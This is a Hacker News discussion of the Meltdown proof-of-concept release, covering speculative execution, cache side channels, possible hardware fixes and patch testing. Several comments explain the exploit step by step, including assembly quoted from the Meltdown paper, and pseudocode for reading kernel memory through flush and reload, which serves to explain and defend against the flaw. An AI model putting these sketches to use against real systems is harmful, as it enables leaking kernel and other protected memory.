Settings

Theme

Meltdown Proof-of-Concept

github.com

760 points by __init 8 years ago · 186 comments

Reader

martin1975 8 years ago

I'm curious if someone can point me to any source that discusses how the next generation of CPUs that Intel, AMD, ARM might be working on is actually going to address this & the Spectre issue architecturally.. It's great that we have a potentially performance killing fix but the real "fix" or rather, solution, is to alter the architecture. Since I'm not an EE/CE dude... is anyone aware of where such discussions on the WWW might be taking place?

by the way, that PoC was intense. Makes you wonder if the NSA knew about it all along :)

  • krylon 8 years ago

    > by the way, that PoC was intense. Makes you wonder if the NSA knew about it all along :)

    Colin Percival found a very similar issue with Intel's implementation of SMT on the Pentium 4 in 2005: http://www.daemonology.net/papers/htt.pdf

    So the general idea of using timing attacks against the cache to leak memory has been known for at least that long.

    In 2016, two researchers from the University of Graz gave a talk at the 33C3, where they showed that they had managed to use that technique to establish a covert channel between VMs running on the same physical host. They even managed to run ssh over than channel. https://media.ccc.de/v/33c3-8044-what_could_possibly_go_wron...

    In light of that, I would be surprised if the NSA had not known about this.

    • tptacek 8 years ago

      Can I put a plug in again for how fucking cool the Meltdown and Spectre attacks are? They're much more interesting than just cache timing, which as you note have been well-known for at least a decade (and much earlier in the covert channel literature).

      Unlike "vanilla" cache-timing attacks:

      * Meltdown and Spectre involve transient instructions, instructions that from the perspective of the ISA never actually run.

      * Spectre v1 undermines the entire concept of a bounds check; pre-Spectre, virtually every program that runs on a computer is riddled with buffer overreads. It's about as big a revelation as Lopatic's HPUX stack overflow was in 1995. There might not be a clean fix! Load fences after ever bounds check?

      * Spectre v2 goes even further than that, and allows attackers to literally pick the locations target programs will execute from. Try to get your head around that: we pay tens of thousands of dollars for vulnerabilities that allow us to return to arbitrary program locations, and Spectre's branch target injection technique lets us use the hardware to, in some sense, do that to any program. And look at the fix to that: retpolines? Compilers can't directly emit indirect jumps anymore?

      It's good that we're all recognizing how big a problem cache timing is. It was for sure not taken as seriously as it should have been outside of a subset of cryptographers. But Meltdown and Spectre are not simply cache timing vulnerabilities; they're a re-imagining of what you can do to a modern ISA by targeting the microarchitecture.

      • krylon 8 years ago

        > Can I put a plug in again for how fucking cool the Meltdown and Spectre attacks are?

        Yes, you can! :)

        I get your point. From the perspective of somebody who normally does not deal with such low-level affairs, the difference to prior cache timing attacks is not /that/ obvious. It all looks like black magic to me, even after I roughly understand how it works.

      • _wmd 8 years ago

        There's no reason to invent new terminology for speculative execution. Also, the mapping between the variety of CPU caches and real memory has been known imperfect since the beginning of time.

        But meanwhile, yes, can definitely agree how fucking cool it all is

        • tptacek 8 years ago

          What new terminology got invented?

          • _wmd 8 years ago

            Perhaps I've been living under a rock for the past 30 years, but transient instructions are a new idea for me

            • tptacek 8 years ago

              What's the "old" term for speculated instructions that aren't retired?

              • mehrdadn 8 years ago

                I've never heard of a term for them but I would find "speculated instructions" clear enough in context.

                • tptacek 8 years ago

                  "Speculated instructions" is ambiguous, because it includes instructions that are retired, and we specifically care about the ones that aren't.

    • chx 8 years ago

      > In light of that, I would be surprised if the NSA had not known about this.

      Call me a tinfoil hat conspiracist but the only rational explanation I can find of IBM POWER and z CPUs still vulnerable to Spectre is the NSA forcing IBM not to fix it. I read somewhere that the z196 had three magnitudes more validation routines than the Intel Core at that time. It's extremely hard to believe they haven't caught this.

    • warkdarrior 8 years ago

      Cache timing attacks have been known for a while, for example across VMs in 2009: https://cseweb.ucsd.edu/~hovav/dist/cloudsec.pdf

      • ckastner 8 years ago

        This paper from 2005 describes a cache timing attack that enabled an unprivileged process to another process' AES key:

        https://www.cs.tau.ac.il/~tromer/papers/cache.pdf

        IIRC, the only way to address the issue was the addition of the AES-NI instruction set, which came a few years later.

        • cesarb 8 years ago

          > IIRC, the only way to address the issue was the addition of the AES-NI instruction set, which came a few years later.

          Another option would be to use a bitsliced implementation of AES, at some cost in speed. I could also imagine an implementation which read the whole table every time, using constant-time operations to select the desired element(s), but I don't know how slow that would be.

  • arkadiyt 8 years ago

    > Makes you wonder if the NSA knew about it all along :)

    Former head of TAO Rob Joyce said "NSA did not know about the flaw, has not exploited it and certainly the U.S. government would never put a major company like Intel in a position of risk like this to try to hold open a vulnerability." [1]

    Who knows if that's true or not, though. Certainly the U.S. government has done exactly that many times in the past (like with heartbleed).

    [1]: https://www.washingtonpost.com/business/technology/huge-secu...

    • SheinhardtWigCo 8 years ago

      It's odd to publicly state that they didn't know about it, because now if they don't do the same after the next big flaw comes out, the implication will be that they indeed knew and were quietly exploiting it. I thought that was why they generally don't comment on these things. The less-charitable assumption is that they'll make this claim every time regardless of whether it's true.

      The claim that "the U.S. government would never put a major company like Intel in a position of risk" is obviously bullshit. TAO's job necessarily involves exposing companies both in the US and overseas to that kind of risk on a daily basis.

      • arrestedDevelpr 8 years ago

        Implications? Who cares what the peanut gallery thinks?

      • dirtbox 8 years ago

        It's the type of announcement that makes me wonder if they had the chip makers incorporate it specifically for them to exploit.

        • mehrdadn 8 years ago

          > It's the type of announcement that makes me wonder if they had the chip makers incorporate it specifically for them to exploit.

          ...sorry, what?

          It makes you wonder if the NSA had chip makers incorporate speculative execution and caching because... timing attacks?

          • dirtbox 8 years ago

            No.

            It's just that it's highly suspicious that anyone is making any type of mention of it at all.

    • rdtsc 8 years ago

      That is an odd one. Why say that instead of of the usual, "we can't comment on that".

      > U.S. government would never put a major company like Intel in a position of risk like this to try to hold open a vulnerability." [1]

      They subverted the Dual_EC_DRBG standardization process. Had they not been caught and the algorithm ended up on more devices they would be hurting not just major companies but whole industries.

      Also for reference: https://en.wikipedia.org/wiki/Bullrun_(decryption_program)

    • mpweiher 8 years ago

      <tinfoil>

      Note that it talks about "the flaw", whereas Intel claims it isn't a "flaw". So could be another instance of overly specific denial. "We didn't exploit this flaw, because it isn't a flaw. We exploited the processor operating as designed".

      </tinfoil>

    • arkh 8 years ago

      > the U.S. government would never put a major company like Intel in a position of risk like this to try to hold open a vulnerability

      The US government sure. The NSA? They sure would as this statement shows.

      • amdavidson 8 years ago

        Are you arguing that the NSA does not fall under the umbrella of the "US Government"?

  • white-flame 8 years ago

    To my understanding, the memory subsystem is fetching a byte in parallel with access permission checks. If the byte is discarded due to mis-speculation, then the result of the permission check is ignored, but the cache is still in an updated state.

    I believe one solution would be to put permission checks before the memory access, which would add serialized latency to all memory access. Another would be to have the speculative execution system flush cache lines that were loaded but ultimately ignored, which would be complex but probably not be as much of a speed hit.

    (edit: yeah, a simple "flush" is insufficient, it would have to be closer to an isolated transaction with rollback of the access's effects on the cache system.)

    • jimrandomh 8 years ago

      Flushing cache lines doesn't work, at least not straightforwardly. The attacker can arrange things so that the cache line is pre-populated with something else that it has access to, with a colliding address that will be evicted by the speculative load. Flushing undoes the load, but can't easily undo the eviction.

    • tzs 8 years ago

      > I believe one solution would be to put permission checks before the memory access, which would add serialized latency to all memory access.

      I don't see why that would have to add latency to all (or any) memory access. The addresses generated by programs (except in real mode, when everything has access to everything anyway so we don't care about these issues then) are virtual addresses, so they have to be translated to get the actual memory address.

      The permission information for a page is stored in the same place as the physical address translation information for that page. The processor fetches it at the same time it fethes the physical base address of the page.

      They should also have the current permission level of the program readily available. That should be enough to let them do something about Meltdown without any performance impact. They could do something as simple as if the page is a supervisor page and the CPU is not in supervisor mode don't actually read the memory. Just substitute fixed data.

      Note that AMD is reportedly not affected by Meltdown. From what I've read that is because they in fact do the protection check before trying to access the memory, even during speculation, and they don't suffer any performance loss from that.

      Note that since Meltdown is only an issue when the kernel memory read is on the path that does NOT become the real path (because if it becomes the real path, then the program is going to get a fault anyway for an illegal memory access), the replacing of the memory accesses with fixed data cannot harm any legitimate program.

      Spectre is going to be the hard one for the CPU people to fix, I think. I think they may have to offer hardware memory protection features that can be used in user mode code to protect parts of that code from other parts of that code, so that things that want to run untrusted code in a sandbox in their own processes can do so in a separate address space that is protected similar to the way kernel space is protected from user space.

      It may be more complicated than that, though, because Spectre also does some freaky things that take advantage of branch prediction information not being isolated between processors. I haven't read enough to understand the implications of that. I don't know if that can be defeated just be better memory protection enforcement.

      • ahh 8 years ago

        > I don't see why that would have to add latency to all (or any) memory access. The addresses generated by programs (except in real mode, when everything has access to everything anyway so we don't care about these issues then) are virtual addresses, so they have to be translated to get the actual memory address.

        L1 caches are generally virtually indexed for exactly this reason: to allow a L1 cache read to happen in parallel with the TLB lookup. (They're also usually, I believe, physically tagged, so we have to check for collisions at some point, but making sure there's no side channel information at that point is, obviously given recent events, hard.)

      • tomatocracy 8 years ago

        Indeed - Meltdown has an "easy" fix and now it's known it should be possible to design chips which are not vulnerable.

        Spectre is, as you say, harder - but more because the line of what sort of state should be separate isn't as clear-cut as we might like it to be (i.e. it's not neccessarily just "processes" as the OS sees it - e.g. JVM/JavaScript interpreter state should allow for an effective sandbox between the executing interpreter/JVM process and what the running JVM/JavaScript code can see). And worse, those are precisely the cases where one probably cares most about separation given that's where untrusted code is typically run.

        But hardware assistance could help - in simple terms, I'd imagine that allowing a swap out of more of the internal processor state (to the extent that one process "training" the branch-predictor doesn't impact how the branch predictor acts in another process) would be pretty effective. That might be expensive in terms of performance per-transistor/per-watt however (though probably not absolute performance).

        • tsukikage 8 years ago

          If we're looking at hardware design changes, it really feels like what we actually need is to add a place to hold a nonce that the OS/hypervisor can set per-process/per-vm, and incorporate those bits in the CPU cache tags so cache lines never match across security boundaries, which would close the side channel used to exfiltrate information.

    • thisoneforwork 8 years ago

      Would "flushing on ignore" not leave the cache side channel open for many instructions before the abort?

    • martin1975 8 years ago

      the first approach sounds kind of expensive to be done at the cpu level. I like your second one better. thank you!

      • dannyw 8 years ago

        AMD already takes the first approach to prevent Meltdown.

      • white-flame 8 years ago

        Actually, my preferred solution would be to eliminate the notion of distributing machine code binaries entirely, but that's a bit beyond the scope of these discussions. ;-)

        • martin1975 8 years ago

          so run everything in a VM?

          • white-flame 8 years ago

            No, creating a block of machine code bytes to execute would be a privileged operation. All code would run through a privileged CPU-specific compiler first, and there'd be no way to run raw machine code bytes otherwise.

            If there are bugs that can be exposed through various machine code patterns, the compiler can centralize the restrictions of what may be executed, enforce runtime checks, or prevent certain instructions from being used at all. Security or optimization updates would affect all running programs automatically. Granted, these current speculative vulnerabilities would be much more difficult to statically detect.

            But it would follow the crazy gentoo dream of having everything optimized for your environment better, allow much better compatibility across systems, and prevent entire classes of privilege escalation issues.

            • Terr_ 8 years ago

              > no way to run raw machine code bytes otherwise [...] restrictions of what may be executed, enforce runtime checks, or prevent certain instructions from being used at all [...] everything optimized for your environment better, allow much better compatibility across systems and prevent entire classes of privilege escalation issues.

              So... basically re-inventing Java? :)

              "Raw machine code bytes" aren't distributed but occur through the privileged JVM and its just-in-time compiler, the byte-code verifier enforces restrictions on what data-access patterns and where instructions can be used, the JVM for a particular OS has optimizations for that environment, and sandboxing (while imperfect) blocks some classes of privilege escalation issues.

              Don't get me wrong, I'm not saying Java is perfect or that the underlying goal isn't good, I'm just happily amused by this sense of "everything old is new again."

              • JdeBP 8 years ago
              • white-flame 8 years ago

                Well, to me Java is still new tech. ;-) But yes, it's certainly a reasonable sampling into non-machine code distribution, and enforcement of security rules when actually running/JITting the code, as were some mainframe developments before then.

                Of course, Java certainly does have some higher level weaknesses as in the introspection API kerfuffle a while back, and is too locked into its Object Obsessed design for it to be a truly general purpose object code format.

              • londons_explore 8 years ago

                Arguably x64 assembly code is the same...

                A privileged process (the microcode) enforces restrictions and converts it to micro-ops which execute on the real processor.

            • dreish 8 years ago

              I've been thinking along the same lines for the last few years. If you did this, you could have a multi-user operating system in a single address space and avoid the cost of interrupts for system calls (which would just be like any other function call).

            • mykull 8 years ago

              We'd need a better binary representation of uncompiled code, then. Moving around lots of code as ascii is kind of suboptimal... I wouldn't want that. By all means, show it as text to the user, but don't store it that way.

            • martin1975 8 years ago

              and what if I wrote a compiler that doesn't heed any of your security concerns? It would still compile to machine code and continue to be able to exploit things Spectre/Meltdown style? Or am I off here?

              • white-flame 8 years ago

                You'd only be able to run it on your system. At least, without other means of breaching the low level secured configuration of someone else's machine, because that's where the One True Compiler for that system lives.

              • gumby 8 years ago

                If I were taking this approach I might not even tell you the instruction set of the machine, so your compiler wouldn’t be useful.

              • XorNot 8 years ago

                I think the idea is you just never accept foreign machine code.

            • martin1975 8 years ago

              cool .. I think I get it. It's like compiler/instruction based DRM ... CPU specific permission to run code. Maybe they can leverage existing TPM chips to do this...

              I just don't want to see performance being decimated as a trade off for security, if at all possible.

      • spullara 8 years ago

        i'm not so sure. memory accesses are so slow (hundreds of cycles) it probably wouldn't be that much slower to issue them a few instructions later. when it was introduced memory access and cycles were much closer together, only a few cycles and it saved a huge amount of time.

        • gpderetta 8 years ago

          Main memory access take an order of hundred cycles. D1 cache hit access usually take usually 3-4 cycles. Microarchitecture designers will take heroic efforts to even shave a single cycle here. Adding an overhead of even a couple of cycles would be a huge deal.

          Having said that, AMD CPUs are the existence proof that you can be immune to meltdown with no significant overhead.

          Spectre is a completely different issue though.

          • londons_explore 8 years ago

            AMD CPUs have pretty poor single threaded performance.

            Perhaps that because they haven't taken the speed short-cuts that Intel took...?

            • jandrese 8 years ago

              Didn't Ryzen close the single thread performance gap quite a bit?

              But yeah, protecting against it means implementing memory protection in more places in the CPU. More gates and the possibility of becoming a bottleneck.

            • arcticbull 8 years ago

              With Ryzen, they're pretty much equal on an IPC basis.

  • thisoneforwork 8 years ago

    Not a CPU designer, but my guess is that they will move the cache management logic from the MMU to the µOP scheduler, which will commit to cache on retirement of the speculatively executed instruction. They would then need to introduce some sort of L0 cache, accessible only at the microarchitectural level, bound to a speculative flow, and flushed at retirement.

    • sspiff 8 years ago

      How does this work for two instructions in the pipeline at the same time that refer to the same cache line? If the second instruction executes the read phase before the first is retired/committed to cache, you would be hit by two memory fetch latencies, significantly hurting performance.

      I guess compilers could pad that out with noops to postpone the read until the previous commit is done if they know the design of the pipeline they are targetting. But generically optimized code would take a terrible hit from this.

      • thisoneforwork 8 years ago

        Firstly, thanks for the question. As mentioned, not a CPU designer or trying to teach Intel what to do. More like relying on the hive mind to see if I have the right idea.

        A second instruction in the pipeline would read from the above mentioned L0 cache (let us call it load buffer), much like it would for tentative memory stores from the store buffer.

        Also, two memory fetches in parallel are not twice as long as a memory fetch, if that would be the solution (which I guess would not be the case, as I imagine race conditions appearing)

        • foota 8 years ago

          I don't think you can allow two speculatively executing instructions to read from the same L0 cache.

          For example say the memory address you want to look for being cached is either 0x100 or 0x200 (not realistic addresses but it works for example) based on some kernel memory bit. Then run instructions in userspace that try to fetch 0x100 (with flushes in between). If you notice one that completes quickly, then it must have used the value 0x100 cached in L0 cache by the kernel? (and also run over 0x200 to try and check when it's cached in L0)

          • nialv7 8 years ago

            L0 is only used by speculatively executed uOPs, before they are actually committed. Therefore anything that reads from L0 has to be speculatively executed too.

            So if the uOP populated the L0 was reading from kernel memory, then it won't be committed. And subsequent uOP read from the L0 won't be committed either. So you can't get timing information from them.

            • foota 8 years ago

              But if another instruction reads from the same cache then that one could retire.

  • JdeBP 8 years ago
  • woliveirajr 8 years ago

    I'm curious on how Transmeta chips [0] would have suffered/be unaffected by such exploits. Being a CPU that runs cpu microcodes, probably the patch would be easier, it necessary at all.

    [0] https://en.wikipedia.org/wiki/Transmeta

  • chacham15 8 years ago

    There was a HN article a while ago that discussed making use of an existing cpu isa extension to solve the problem in a performant manner: PCID. More here: http://archive.is/ma8Iw

  • cm2187 8 years ago

    By the way, I understand the fixes are being rolled out now. Do we have a more precise idea of the performance hit on windows and linux?

runesoerensen 8 years ago

The Project Zero bug report (with PoCs/timeline) was also made public a few minutes ago https://bugs.chromium.org/p/project-zero/issues/detail?id=12...

kodablah 8 years ago

This was the GitHub repo mentioned in the meltdown.pdf that was 404'ing until now. We have native Spectre replication code too. What still seems to be elusive is the JS-based Spectre impl (probably waiting at least for Chrome 64, though I confirmed via https://jsfiddle.net/5n6poqjd/ that Chrome seems to have disabled SharedArrayBuffer even before they said they would which wasn't the case a few days ago).

  • diyseguy 8 years ago

    This is the closest thing to a javascript implementation I have seen: http://xlab.tencent.com/special/spectre/js/check.js

    from: http://xlab.tencent.com/special/spectre/spectre_check.html

    • kodablah 8 years ago

      Nice. Reviewing the code, it is as the PDF said where they are just constantly incrementing a val in the shared buffer to get a fairly precise timer. But it seems to be using the timing to determine across 256 indices (99 tries to check) to check cache hits. So just removing this timer is not enough, it just increases the surface area of bytes you have to read and sift through to see if you have other mem? Anyone have a writeup on this?

      • JonathonW 8 years ago

        Isn't the high-precision timer required to detect a cache hit or miss-- as in, the side channel being exploited here is in the timing of a cache hit or miss; there's no data leaked directly into Javascript?

        That's not to say that removing SharedArrayBuffer (and high-precision performance timers, which were removed a couple years back to mitigate some other timing-related vulnerabilities) is enough to completely eliminate Spectre; there might be other methods that can time accurately enough to reveal information.

        (I might be completely wrong here, but this is my current understanding of the situation, at least.)

    • mwambua 8 years ago

      Nice tool. Sadly, it reports that my browser (Chromium 63.0.3239.132 with strict site isolation (chrome://flags/#enable-site-per-process) enabled) is vulnerable to Spectre. Do you know if there are any other steps that I can take to secure myself aside from using Firefox?

      • btb 8 years ago

        I'm running the same version of Chrome(with site isolation enabled), its reporting "Your browser is NOT VULNERABLE to Spectre" for me. Also in incognito mode with extensions disabled.

        • mwambua 8 years ago

          Thanks! It reports the same thing for me too now. I had to enable Top document isolation (chrome://flags/#enable-top-document-isolation) as well.

    • gadgetoid 8 years ago

      Found this earlier today via GitHub search: https://github.com/cgvwzq/spectre/blob/master/spectre.js

    • dingo_bat 8 years ago

      Interesting that Firefox on my phone is shown vulnerable but Samsung browser is not.

thebeardedone 8 years ago

Moritz Lipp's twitter is actually interesting to follow. He is reconstructing images which do not fit into cache. Quite amazing.

https://twitter.com/mlqxyz/status/950378419073712129

(I personally do not have a twitter account but was looking for the paper and stumbled upon it, glad I did!)

trendia 8 years ago

Linux 4.15 and the appropriate modules protect against the attack.

To test, set CONFIG_PAGE_TABLE_ISOLATION=y. That is:

    sudo apt-get build-dep linux
    sudo apt-get install gcc-6-plugin-dev libelf-dev libncurses5-dev
    cd /usr/src
    wget https://git.kernel.org/torvalds/t/linux-4.15-rc7.tar.gz
    tar -xvf linux-4.15-rc7.tar.gz
    cd linux-4.15-rc7
    cp /boot/config-`uname -r` .config
    make CONFIG_PAGE_TABLE_ISOLATION=y deb-pkg
  • noobermin 8 years ago

    I have CONFIG_PAGE_TABLE_ISOLATION on. I roll my own kernel and all that.

    Trying the kaslr program right now, it's not figuring out the direct map offset and it's probably already been a minute or two. So it works?

    EDIT: After 40 minutes, it has attempted all addresses and did not find the direct map offset.

    • trendia 8 years ago

      It took about an hour for it to find the offset for me.

      I think that the page isolation slows it down, even if it doesn't completely eliminate it.

      The second test had something like a 0.05% success rate on my PC, and took over an hour to get a few dozen values read.

      After trying this with the new kernel, I started up an AWS instance and ran the tests there. The first test (KASLR) succeeded within a few seconds, and the second test had a 100% success rate (read 1575 values in a few seconds).

      • noobermin 8 years ago

        Basically, the first test (kaslr.c) did not even work for me, and it scanned all addresses and wrapped around and started again.

        You probably know this (saw you're the person I replied to initially), but for others reading this to check that it's on, "dmesg | grep isolation" should be able to tell you whether the page table isolation is on after you enable it in the kernel.

        Given the other tests require the offset, I think I'm safe? I'm going to run it again just to be sure.

  • Valmar 8 years ago

    Page Table Isolation has been backported to 4.14.12, so no need to test with the rc.

tptacek 8 years ago

libkdump is really clean code and worth a read, nicely wrapping the inline assembly you need to do the flush+reload and keeping the algorithms in pretty simple C. It's worth taking a few minutes to read through it.

This code is from TU Graz; I assume this is from Daniel Gruss's team, who participated in the original research.

samsonradu 8 years ago

High-level programmer here. Can someone explain please (already read the ELI5 in previous threads) how does the attacker extract the actual data from the processor L1 cache after tricking the branch prediction and have the CPU read from an unauthorized memory location?

I understood the "secret" data stays in the caches for a very short time until the branch prediction is rolled back, which makes this a timing attack but don't get how you actually read it.

EDIT

So perhaps someone can ELI5 me "4.2 Building a Covert Channel" [1] from the Meltdown paper which is what I didn't understand.

[1] https://meltdownattack.com/meltdown.pdf

  • alien_at_work 8 years ago

    Mostly high-level programmer. I may be wrong or be thinking of another recent attack but my understand was this: the attacker allocates 256 seperate pages, ensures they're not in memory and then runs code like this:

        if(false_but_predictive_execution_cant_tell)
        {
          int i = (int)*protected_kernel_memory_byte;
          load_page(i, my_pages);
        }
    
    Then it becomes a matter of checking speed of reading from those pages. Which ever one is too fast to be loaded when read must be the value read from protected memory.
  • ajanuary 8 years ago

    Caveat: I am also a high level programmer.

    My understanding is that the problem is that the data in the cache _isn't_ rolled back.

    You fetch the secret data. You then fetch a different memory addressed based on the contents of the secret data e.g. fetch((secret_bit * 128) + offset) [1] so if secret_bit is 0 it's fetched the memory at offset into the cache, if secret_bit is 1 it's fetched the memory at offset+128 into the cache.

    After the speculative work is rolled back, the data that it fetched into the cache still remains. You then time how long it takes to fetch offset and offset+128. If offset comes back quickly, secret_bit was 0. If offset+128 comes back quickly, secret_bit was 1.

    _That_ is where the timing attack part comes in: "timing attack" refers to using measurements of how long something took to glean information, not that you need to do it quickly.

    [1] In reality you do it on the byte level and use &, but I wanted to keep it to guessing a single bit to make it simpler.

    • samsonradu 8 years ago

      > You fetch the secret data. You then fetch a different memory addressed based on the contents of the secret data ...

      I was under the impression that there is no interface to read data from the CPU caches and that the cache is managed by the CPU itself only.

      • ajanuary 8 years ago

        Right, which makes it a bit of a tricky attack to pull off. But if you know what you're doing you can do some operation that requires memory address x and be reasonably sure it will end up in the CPU cache. If you then do an operation on memory address x, and it happens really quickly, and you do an operation on memory address x+128, and it happens a bit slower, you can assume that x was in the cache and x+128 wasn't.

        • samsonradu 8 years ago

          Yes, I got the part where you can time if memory address X is in cache and X+128 isn't. But how does one read the data at memory address X?

          • ajanuary 8 years ago

            You load it into a register. If you're trying to drive it from a high level language, I guess you can do something like an add which will get compiled into instructions to load it into a register first.

  • PeterisP 8 years ago

    It does not "stays in the caches for a very short time until the branch prediction is rolled back", the core of the problem is that speculative instructions caused by out of order execution or branch prediction leave a side-effect (whether some memory location was fetched to cache or not) that can be read for a long time afterwards.

    The covert channel consists of a "sender" and a "receiver". The receiver can't extract contents of L1 cache, but it can detect which pages were in cache by timing differences. So the sender encodes the secret data by fetching particular addresses calculated so that the receiver can afterwards recover the secret by verifying which page(s) were in cache.

    In Meltdown attack, the sender consists of instructions controlled by you - e.g. x=memory_you_shouldn't_access; y=array[1000x] - and after an Intel processor notices that you shouldn't access that memory and rolls back the instructions (invalidating y and x), the 1000x location was already pulled to cache, and you can check - is array[1000] cached? is array[2000] cached? is array[142000] cached? to determine x.

    In Spectre attack, the sender consists of code in the vulnerable application that happens to contain similar instructions. Spectre attack means that if your application anywhere contains code like if (parameter is in bounds) {x=array1[parameter]} (...possibly some other code...) y=array2[x], then any attacker that (a) runs on the same CPU and (b) can manipulate the parameter somehow can trick this code to process the path "protected" by 'if' and reveal random memory out of bounds of that array1. The difference from ordinary buffer overflow bugs is that code like that is normal, common and (in general) not a bug, since the instructions "don't get executed", and the vulnerability persists even if you validate all input.

krylon 8 years ago

I have run the first test on several machines, with mixed results, but on my workhorses (ThinkPad x220, Zenbook UX305) the exploit seems to work.

I thought the recent kernel-/firmware-/ucode-patches should have prevented that.

EDIT: The other demos fail, though, as they should. sigh

EDIT: For some reason, demo #2 (breaking kaslr) works on my Ryzen machine, but not on the others. :-?

  • cookiecaper 8 years ago

    Spectre should work on most modern computers. There are no kernel patches in stable to prevent Spectre right now. Only Meltdown is mitigated by KPTI. The new Intel microcode and the kernel code to control it will propagate out in the next couple of weeks.

anonymousDan 8 years ago

Looks like Intel SGX is at least vulnerable to Spectre attacks too: https://github.com/lsds/spectre-attack-sgx

pbhjpbhj 8 years ago

First I read about this, so I thought "who's shorting Intel now I wonder", turns out it's the CEO [kinda]:

>"reports this morning that Intel chief executive Brian Krzanich made $25 million from selling Intel stock in late November, when he knew about the bugs, but before they were made public" (https://qz.com/1171391/the-intel-intc-meltdown-bug-is-hittin...)

I assume he's supposed to now be prosecuted, that sounds like insider dealing? [I'd like to say "will be prosecuted" but ...]

  • stefs 8 years ago

    as far as conspiracy theories go (i read that some days ago on reddit), he's wont be persecuted because he cooperates with the NSA. refuse to cooperate with them and join Nacchio and Qwest.

aeleos 8 years ago

I am running a razer blade 2017 with ubuntu 16.04 and so far all of the PoCs have worked. I currently have my kaslr offset and I am now testing the reliability. So far it doesn't seem very good with a 0.00% success rate at 60 reads. It did take a while to find my kaslr offset with multiple passes through the entire randomization space so I need to stress my CPU more in order to improve the success rate of having successful branch speculations.

  • jeshwanth 8 years ago

    I installed the recent kernel release from Ubuntu, but the tests still working fine.

Uplink 8 years ago

Not sure what this means, but while I'm mining Monero on the CPU with xmr-stak the PoC is thwarted.

First, the "Direct physical map offset" comes back wrong in Demo #2. Second, if I use the correct offset, the reliability is around 0.5% in Demo #3 - but not consistently... after a few tries it did come back with >99%

Basically, screw up your caches continuously.

srcmap 8 years ago

From the papers, these two bugs are also exploitable from ARM.

Does it mean a hacked IOS/Android app can also (in theory) sniff the password enter in system dialog as demo in the video?

   Realtime password input - https://www.youtube.com/watch?v=yTpXqyRYcBM
  • tptacek 8 years ago

    It depends. From what I'm reading: generally, with apparently one possible exception, Meltdown doesn't work on ARM. Generally, both variants of Spectre do.

  • gok 8 years ago

    Important to differentiate between ARM the company, the instruction set architecture(s) and the specific implementation of those ISAs. The licensable nature of ARM means there very likely are (possibly undiscovered) implementations of the ARM ISAs floating around which are susceptible to Meltdown.

    • palotasb 8 years ago

      I was under the impression that they generally license the IP cores (or at least some IP blocks) to implement the ISA and downstream vendors don't implement those differently.

Acen 8 years ago

MacOS is yet to have a patch for 10.12.6 (Sierra) to resolve this.

rstuart4133 8 years ago

Does anyone have a link to Linux PoC code for Meltdown that uses speculative branch execution?

I've only seen two implementations: one based just doing the access to kernel memory, catching the SIGSEGV, and then probing the cache. Obviously that could be closed by the kernel flushing the cache prior handing control back t user space after SIGSEGV. Doing that would have no impact on normal programs.

The second is by exploiting a bug in Intel's transactional memory implementation. But I assume Intel could turn that feature off as they have done so in the past. Since bugger all programs use it doing so wouldn't have much impact.

Which means the approach being take now is done purely to kill the speculative branch method (ie, Spectre pointed at the kernel). The authors say it should work, but also say they could not make it work. I haven't been able to find working any PoC for my Linux machines.

So my question is: is there any out there?

VikingCoder 8 years ago

Can the videos be put on YouTube for convenience?

yuhong 8 years ago

One of the reason I don't consider the timing attacks that important is that there are often easier ways to bypass ASLR.

revelation 8 years ago

The secret program confirms what others have seen, it's not so much "read any physical memory" as "read memory in cache"

  • K0nserv 8 years ago

    > "read any physical memory" as "read memory in cache"

    You can force values from any memory to affect the cache in a predictable manner which enables you to read all physical memory. See https://news.ycombinator.com/item?id=16108574 or read the paper yourself https://meltdownattack.com/meltdown.pdf

    • revelation 8 years ago

      This is from Google Zero on Meltdown:

      We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

      Not only is L1D tiny, but stuff like prefetch doesn't touch it. So how exactly do you force any memory into L1D cache unless, like in all the examples we have seen, the victim program is pretty much accessing it in a busy loop?

      • K0nserv 8 years ago

        I'll try to explain the small snippet from the paper. The exploit uses a Flush+Reload attack to use the cache as a side channel to leak memory read in speculative execution. They use a 256 * 4096 byte memory region to leak a 1 byte value from any location mapped to the process. 4096 is the page size and is used to make sure the caching doesn't create false positives. Data across two pages are not cached apparently.

        Here's the example from the paper.

          1: ; rcx = kernel address
          2: ; rbx = probe array
          3: retry:
          4: mov al, byte [rcx] ; Read kernel memory(1 byte) into AL which is the least significant byte of RAX
          5: shl rax, 0xc ; Multiply the collected value by 4096 
          6: jz retry ; Retry in case of zero to reduce noise
          7: mov rbx, qword [rbx + rax] ; Access memory based on the value read on line 4
          8: ; Note: The read on line 4 is illegal, but the CPU speculatively executes line 5-7 before this triggers a fault.
        
        The receiving code then trys to access each of these 256 memory locations and measure the time taken. For one of them the value will be much lower since that memory is cached and thus that location is the value read. So if you read the value 84 on line 4 when you access the value at 344064dec(0x54000)in your memory it will be faster and you can deduce the read value was 84.

        So in pseudo code the attack is

           start = 0xFFEE // No idea if this is a reasonable start location
           result = []
           offset = 0
           page_size = 4096
           probe_array = malloc(256 * page_size)
        
           loop {
             flush_caches(probe_array)
             read_and_prepare_cache(start + offset * 8, probe_array) // The above assembly
             result.push(determine_read_value(probe_array)) 
             offset += 1
           }
        
        
        There's an extra detail here about recovering from the illegal memory access in a quick way that I've skipped.

        To answer the parents question I believe this only uses a single cache line(64 bits) since it only accesses a single value.

        This is my understanding anyway, happy to be corrected

    • koolba 8 years ago

      > You can force any memory into the cache so yes it's is read any physical memory.

      Is there a direct method for that or do you mean that you can repeatedly try reading memory addresses until the address that you want to access is actually in the cache prior to your access?

      • K0nserv 8 years ago

        The exploit is based on reading values that you shouldn't be allowed to access in speculative execution and then using the returned values to create persistent changes in the cache(they persist even after the CPU detects your illegal access). Those persistent changes are then read via a side channel attack.

        So you read any address you want speculatively and then use the result to prime the cache in such a way that you can determine what the value you read speculatively was. This works because modern operating systems map kernel space addresses into normal processes and to make syscalls faster.

        I'd recommend reading the paper[0], it's fascinating stuff.

        https://meltdownattack.com/meltdown.pdf

      • ctrlrsf 8 years ago

        It doesn’t force memory into cache directly. It determines values of bytes in memory by using the byte as a multiplier to an offset in memory. To determine byte value you can check all the offset combinations to see which was cached. Details in the meltdown paper.

      • tptacek 8 years ago

        The relationship between the attacker and cache is fundamental to the attack; the Meltdown paper does a really good job explaining this.

  • tptacek 8 years ago

    The entire point of the attack is that attackers can coerce targets to predictably load things into cache, which is why you're being downvoted. You should re-read the Meltdown paper; it's very clear (and significantly easier to read than the Project Zero writeup, which is good but goes deep into implementation details).

john_teller02 8 years ago

